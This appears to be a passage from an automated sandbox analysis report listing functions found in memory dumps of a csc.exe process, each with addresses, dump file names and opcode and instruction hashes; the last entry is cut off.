                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c7119714bf88b99a2bb91400e5a6841286e3015e6a9086de3f877740d0768596
                                                                                                                                                      • Instruction ID: c730f618d91bafe84f6d67e81db2944010344d5147891c0932201a66ddc25674
                                                                                                                                                      • Opcode Fuzzy Hash: c7119714bf88b99a2bb91400e5a6841286e3015e6a9086de3f877740d0768596
                                                                                                                                                      • Instruction Fuzzy Hash: 5A31D236618B618FC7315B25C462A29FBA9FF45759B0940A6F8468F621C639DC00CF92
                                                                                                                                                      Function 0936AE78 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4a139a76a46e3e3592899bd78f9a2849f8adc20065ca4a0c2af6baa6274fbb20
                                                                                                                                                      • Instruction ID: 9f69b2ea3d685ded55982954697fd50487ed2837a34a5520ac73d323ebd8f36f
                                                                                                                                                      • Opcode Fuzzy Hash: 4a139a76a46e3e3592899bd78f9a2849f8adc20065ca4a0c2af6baa6274fbb20
                                                                                                                                                      • Instruction Fuzzy Hash: AC31B8766101149FCB15DF98D998E99BBB2FF48320B1680A8F5099F372C731ED56DB40
                                                                                                                                                      Function 093690F0 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f973a105bd0ced5d3a02cd04fafe719bc0ca6fdd0244d11497e399c7faa7b823
                                                                                                                                                      • Instruction ID: 0e614f775b6ad721085e41a53b68d702931685d6ffa1a5d0243df55f1035f7f1
                                                                                                                                                      • Opcode Fuzzy Hash: f973a105bd0ced5d3a02cd04fafe719bc0ca6fdd0244d11497e399c7faa7b823
                                                                                                                                                      • Instruction Fuzzy Hash: 2B21C7313052149FC7159B69EC48A6ABBEADFC1364B25C07AF149CB2A2DB35EC41CBD1
                                                                                                                                                      Function 093620E0 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5e93dbeeb840ea6e57bf99aaed6f256791589f23f3b09c2ff528cd79fabc61b1
                                                                                                                                                      • Instruction ID: bccdbf1851119df2028b3b7beffb308d5c64c684f10b8406713e64bba24514e3
                                                                                                                                                      • Opcode Fuzzy Hash: 5e93dbeeb840ea6e57bf99aaed6f256791589f23f3b09c2ff528cd79fabc61b1
                                                                                                                                                      • Instruction Fuzzy Hash: 6D31BC307013059FC729AF61C85092BBBB6EF89314B20846DE9528B3B4DB31EC46CB90
                                                                                                                                                      Function 0A2808A0 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d37be0a12a8afcab94686cef0948ac42f460149ff5846b62c813d89709ced468
                                                                                                                                                      • Instruction ID: 23ae633a69b24ea692ea9f9a2d1c8ba94b3f39851368f13a5f9e5d9d16f80573
                                                                                                                                                      • Opcode Fuzzy Hash: d37be0a12a8afcab94686cef0948ac42f460149ff5846b62c813d89709ced468
                                                                                                                                                      • Instruction Fuzzy Hash: 61411FB1D11248DFDF14DFAAD954ADEFBB5AF88310F10802AE419B7290DB35A949CF90
                                                                                                                                                      Function 0A28984E Relevance: .1, Instructions: 85COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 93a4c5aa2527a2a19c3300e1d1a33a36f5c0605add966c0340636f7ecdfd082f
                                                                                                                                                      • Instruction ID: 2b9e16377582657d031515a3f7ffc27d2fc8ba90aa840321f8c0c5e9dee098d8
                                                                                                                                                      • Opcode Fuzzy Hash: 93a4c5aa2527a2a19c3300e1d1a33a36f5c0605add966c0340636f7ecdfd082f
                                                                                                                                                      • Instruction Fuzzy Hash: 4E314BB0636102DBDB28EF95D448BB9B3A2BB80311F19C175E41A4B6D5D778ADC2CF00
                                                                                                                                                      Function 0A2890C0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 39430ee506c5723b35af3e5e0862cb1ebde1e087f74062135f99de40d54346b9
                                                                                                                                                      • Instruction ID: 854cdfce7bf30676bc77ebd0db5732e9ed43abc48da1760c9685ea87534601f8
                                                                                                                                                      • Opcode Fuzzy Hash: 39430ee506c5723b35af3e5e0862cb1ebde1e087f74062135f99de40d54346b9
                                                                                                                                                      • Instruction Fuzzy Hash: FC31D7F0225105DFD724DA89C084B75B3A2FB80314F018275E6054BED6D7B6BCC1CB41
                                                                                                                                                      Function 09379425 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 61d0625e308a6ce8ca23e5ad121e3eb5b2eeed5c719b3ff4d6e857980e6b3b80
                                                                                                                                                      • Instruction ID: 625a31c946886bfa884f35a5a6e0a701ba0f0894f91039cf90613ccb58c618f6
                                                                                                                                                      • Opcode Fuzzy Hash: 61d0625e308a6ce8ca23e5ad121e3eb5b2eeed5c719b3ff4d6e857980e6b3b80
                                                                                                                                                      • Instruction Fuzzy Hash: 85318D70A053149FCB14CF69D954BAABBF2BF49310F008669E4069B3A1DB399D45CBA1
                                                                                                                                                      Function 0A2821F0 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: bae94ddcf28257a788598da07a030ba2ea9b0fd1af23c6684755889805c2024a
                                                                                                                                                      • Instruction ID: a45dd342e80759cfc7fb203954e5afd222ca0f987adee848de3b1eb10a30b7c1
                                                                                                                                                      • Opcode Fuzzy Hash: bae94ddcf28257a788598da07a030ba2ea9b0fd1af23c6684755889805c2024a
                                                                                                                                                      • Instruction Fuzzy Hash: 16210A75721106DBC714EB64E9506AE7366FBC5310F10C239E825973C8DB34ED02CB92
                                                                                                                                                      Function 0A284DB8 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 1fe8c2a1d182d3bd507ce67532a417da508caa26cc672bdf1bf8a357abeed45c
                                                                                                                                                      • Instruction ID: 1ea7b98337da4fab351eb59a16102d74e479dfacd796e678bc37e19d95df5afb
                                                                                                                                                      • Opcode Fuzzy Hash: 1fe8c2a1d182d3bd507ce67532a417da508caa26cc672bdf1bf8a357abeed45c
                                                                                                                                                      • Instruction Fuzzy Hash: FA214975723246AFCB24FF34D8904A97767EB89220B188579FD158B3C5DA30EC02CB95
                                                                                                                                                      Function 0A280894 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d0cdde46eb44136dbac97196bca439aea1c3e2979bcc5d8cd3655f0dc81f2472
                                                                                                                                                      • Instruction ID: 967a3bfa408cbac770bc3af5d125900f7329f02d892929c98757dd601b6f57f3
                                                                                                                                                      • Opcode Fuzzy Hash: d0cdde46eb44136dbac97196bca439aea1c3e2979bcc5d8cd3655f0dc81f2472
                                                                                                                                                      • Instruction Fuzzy Hash: BC3113B0D11249DFDB14DFAAC544AEEFBF5AF88304F10802AE419A7290DB74594ACF51
                                                                                                                                                      Function 0936CCC0 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 018d92c02a1ba85893bc2374632410e3bd85d7d532814367ffeac57677aa3fe1
                                                                                                                                                      • Instruction ID: 32b07ba084e163c42fd72d0eb046d6c758dddda7fc4f21a27a07e2e40b18b3dc
                                                                                                                                                      • Opcode Fuzzy Hash: 018d92c02a1ba85893bc2374632410e3bd85d7d532814367ffeac57677aa3fe1
                                                                                                                                                      • Instruction Fuzzy Hash: DA219674B106198FCB00FF68C45496EB7B5FF89700B10852AD50697324EF70AD06CF92
                                                                                                                                                      Function 0A281138 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6144995b07a327288378ce42d0ee661b388b26f857e783dd4b70d495f437052c
                                                                                                                                                      • Instruction ID: c7c802611d8420f7b7c540f02b521f49ebda0ecc351c4466818ff5b7b36c3273
                                                                                                                                                      • Opcode Fuzzy Hash: 6144995b07a327288378ce42d0ee661b388b26f857e783dd4b70d495f437052c
                                                                                                                                                      • Instruction Fuzzy Hash: 22319371A1060A9FCB40EF7CE8416AEB7B1FF84314F108629E54AA7354EB34B995CBC1
                                                                                                                                                      Function 06B01326 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045988407.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_6b00000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6e3254219caaac635fe4f415922242d6a5a38a4e3c8dcb7857b2014e0e7a6196
                                                                                                                                                      • Instruction ID: a04a7db51c3f2d01b104bef1094ef7418983216e343498bb5beaaae5be50f943
                                                                                                                                                      • Opcode Fuzzy Hash: 6e3254219caaac635fe4f415922242d6a5a38a4e3c8dcb7857b2014e0e7a6196
                                                                                                                                                      • Instruction Fuzzy Hash: CF11DB74B047025BE76E276D686433EBE67DFC5711B0890B9D507C76D1DD288C028692
                                                                                                                                                      Function 0A285257 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 506eaaf4c2dc29cc2bd8caf3c065d76a58bfae3523e90eefa870abe5d8a22529
                                                                                                                                                      • Instruction ID: 70109dab6191c85abd35484357389674cf9c44cce5e3bd01365ccccc04dad228
                                                                                                                                                      • Opcode Fuzzy Hash: 506eaaf4c2dc29cc2bd8caf3c065d76a58bfae3523e90eefa870abe5d8a22529
                                                                                                                                                      • Instruction Fuzzy Hash: 91214C30A11209CFCB18DF69D44459EBBB2EF88325F158269E406AB3A1DB34DC86CFD1
                                                                                                                                                      Function 09361FB0 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c2e2650c5d320fe8710cff78c142e6b3c044b52987c53e3b43dc6b663fa8b6a6
                                                                                                                                                      • Instruction ID: 956ab75867a488106766c21ec63492546fd304b2bc8a45c80d5f14520795c0ad
                                                                                                                                                      • Opcode Fuzzy Hash: c2e2650c5d320fe8710cff78c142e6b3c044b52987c53e3b43dc6b663fa8b6a6
                                                                                                                                                      • Instruction Fuzzy Hash: AE211971A00209DFDB10DEB8D544BAFBBB5AB04380F11C066E529DB2A4E774DA55CF92
                                                                                                                                                      Function 06B01338 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045988407.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_6b00000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: be3e7da3368af5c557e8a7a0322650f8d5a7cfa7eb0d76fcae818a3fbfc19ca5
                                                                                                                                                      • Instruction ID: f78987c0b1363f955fdc588933d817e3d88a3da63a055874239455d4fc0ce403
                                                                                                                                                      • Opcode Fuzzy Hash: be3e7da3368af5c557e8a7a0322650f8d5a7cfa7eb0d76fcae818a3fbfc19ca5
                                                                                                                                                      • Instruction Fuzzy Hash: 7311D674B0060657F76D26AEA8A833FBDABDBC8711B04D47D9A07837C4DE349C029692
                                                                                                                                                      Function 0936CCB0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a32a2d7e487d563bc57934a46c52f5f01b370befe7ffc442b883de6e87dbf1f1
                                                                                                                                                      • Instruction ID: cd2d73dfcea57751624ebebc582a9e371c375d6197e0762e0dfb7346882c2652
                                                                                                                                                      • Opcode Fuzzy Hash: a32a2d7e487d563bc57934a46c52f5f01b370befe7ffc442b883de6e87dbf1f1
                                                                                                                                                      • Instruction Fuzzy Hash: AA219574A006198FCB00EF68C44499EBBB5FF89710F10856AE505A7374EB30AA06CFE2
                                                                                                                                                      Function 0A283908 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ee44c03ad21c1b8c4de88aaa88a056ecae271a6fec9136e0dc322bec48f00ea4
                                                                                                                                                      • Instruction ID: 346ddb2cc9dab3c0b826817aaf60408e6383929aebf4b0659cf795774684008d
                                                                                                                                                      • Opcode Fuzzy Hash: ee44c03ad21c1b8c4de88aaa88a056ecae271a6fec9136e0dc322bec48f00ea4
                                                                                                                                                      • Instruction Fuzzy Hash: C0110EF1A2A2855FCB05DB78D8600BDBBB6DF9720471881BEF049CB1E2D6355803C761
                                                                                                                                                      Function 0937E840 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 812093ed35e0632432c3ea61003eaa950a34ab783d1828e3c326f521ecd64bd1
                                                                                                                                                      • Instruction ID: 61cca4b27f8eb6604cb1b869bfd421da97caf6e6beaf0c0e28e715131ac17f4f
                                                                                                                                                      • Opcode Fuzzy Hash: 812093ed35e0632432c3ea61003eaa950a34ab783d1828e3c326f521ecd64bd1
                                                                                                                                                      • Instruction Fuzzy Hash: 31213D35A002099FDB15AFA8C4549EEBBB7EF8D320F144169E911B7390DB759C42CFA1
                                                                                                                                                      Function 0A283848 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8b4614d77e23d597a473e17c7470956b3f4e3910fa4c743745c7e3651410dbaa
                                                                                                                                                      • Instruction ID: e867f7dc240c2391280b990a30d59ea55b2cb41e47e4013057a5eecf1818a35d
                                                                                                                                                      • Opcode Fuzzy Hash: 8b4614d77e23d597a473e17c7470956b3f4e3910fa4c743745c7e3651410dbaa
                                                                                                                                                      • Instruction Fuzzy Hash: C0112774A102065FC718EF65C4804BFB776EFC83007208A2DE50657290EB30B807CBE2
                                                                                                                                                      Function 09368CA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3818d5021607b624be750e683338aab730e9e2a737ac4f360d99be6477a0d01e
                                                                                                                                                      • Instruction ID: 6dbc07734501c0df617c7cfbe2c43b46ebe32d0ad7108a06e9e40646dd5f0532
                                                                                                                                                      • Opcode Fuzzy Hash: 3818d5021607b624be750e683338aab730e9e2a737ac4f360d99be6477a0d01e
                                                                                                                                                      • Instruction Fuzzy Hash: 210161357012004F9714AF5DD4C492AB7ABEFD9624318C03AE606CB329CF71DC02DB94
                                                                                                                                                      Function 0A288638 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fe68e343f6dfac3ab5bf914d6e775dc5a4e708db6ebb4c59b9712584a1b7c762
                                                                                                                                                      • Instruction ID: c8fa713e49abcc39e31925f9cb8bc0f742fa5dc6cf1fa785d1bb183b5c1b3e4d
                                                                                                                                                      • Opcode Fuzzy Hash: fe68e343f6dfac3ab5bf914d6e775dc5a4e708db6ebb4c59b9712584a1b7c762
                                                                                                                                                      • Instruction Fuzzy Hash: 6C01FE717001155F8B14BBAA98444BFFBEBDFC9255B404036FA05D3341DB319D06C7A2
                                                                                                                                                      Function 0937D7B0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5946f5c6fafafffa8fd98ace1b80826cb45c00d5552b4019ba4b3517ffb7949e
                                                                                                                                                      • Instruction ID: 705e6b92fe487de089a0eb2a7ab73cc781a10aa5494f8ef4e24797d4df33e59d
                                                                                                                                                      • Opcode Fuzzy Hash: 5946f5c6fafafffa8fd98ace1b80826cb45c00d5552b4019ba4b3517ffb7949e
                                                                                                                                                      • Instruction Fuzzy Hash: A511AD31704240AFE724CE5AD884B67B7EAFFC8B10F658079E1198B7A4DA759C428A40
                                                                                                                                                      Function 0936B630 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ccfc629b593a697392fa1997987b77d6e6ff67f847a8c2494ffabb820231317e
                                                                                                                                                      • Instruction ID: 01ffb24f8046c69e4c0420e3ec1d7d04bbbb3fa14cd20c6c1353a88c80511f66
                                                                                                                                                      • Opcode Fuzzy Hash: ccfc629b593a697392fa1997987b77d6e6ff67f847a8c2494ffabb820231317e
                                                                                                                                                      • Instruction Fuzzy Hash: 15115E393002009FC7059F59D844D9ABBB6FF89761B15849AFA498B371C731DC12DB90
                                                                                                                                                      Function 0A2821E0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d86bd41e413ecb8b6bd8649444e9e0b1bd389d8489e2e66464963f6630e5248d
                                                                                                                                                      • Instruction ID: ee1bdae7b5e71b69ab4921bb0ec892d7f47a36abdd192b78cafd5998630d264f
                                                                                                                                                      • Opcode Fuzzy Hash: d86bd41e413ecb8b6bd8649444e9e0b1bd389d8489e2e66464963f6630e5248d
                                                                                                                                                      • Instruction Fuzzy Hash: 78115CB1712246DFCB14EF60E8908A93B71FBCA2307148129E825873C9C630DC02CB92
                                                                                                                                                      Function 0A283DA7 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e278f81da692f6979052b6c977dddd3b36083333faddbfe0d27b1f710c18e253
                                                                                                                                                      • Instruction ID: 49a7bbc800f8d585d2bd6ba65d832a8bf2ba2aa19e18a3f584c1529638bf7b0a
                                                                                                                                                      • Opcode Fuzzy Hash: e278f81da692f6979052b6c977dddd3b36083333faddbfe0d27b1f710c18e253
                                                                                                                                                      • Instruction Fuzzy Hash: A401C0753192445FC718EFA9D89486ABBEAFFCA710325817DE4068B355CB31EC078B91
                                                                                                                                                      Function 09379415 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ea06e0cebd6007202c6661b3ba846c832a9c748620b8e8661f9237fc4c309651
                                                                                                                                                      • Instruction ID: 281f2066e150aaac1edf485adb001d6f98ef6432d8e9a8c78363bcda6e163fb9
                                                                                                                                                      • Opcode Fuzzy Hash: ea06e0cebd6007202c6661b3ba846c832a9c748620b8e8661f9237fc4c309651
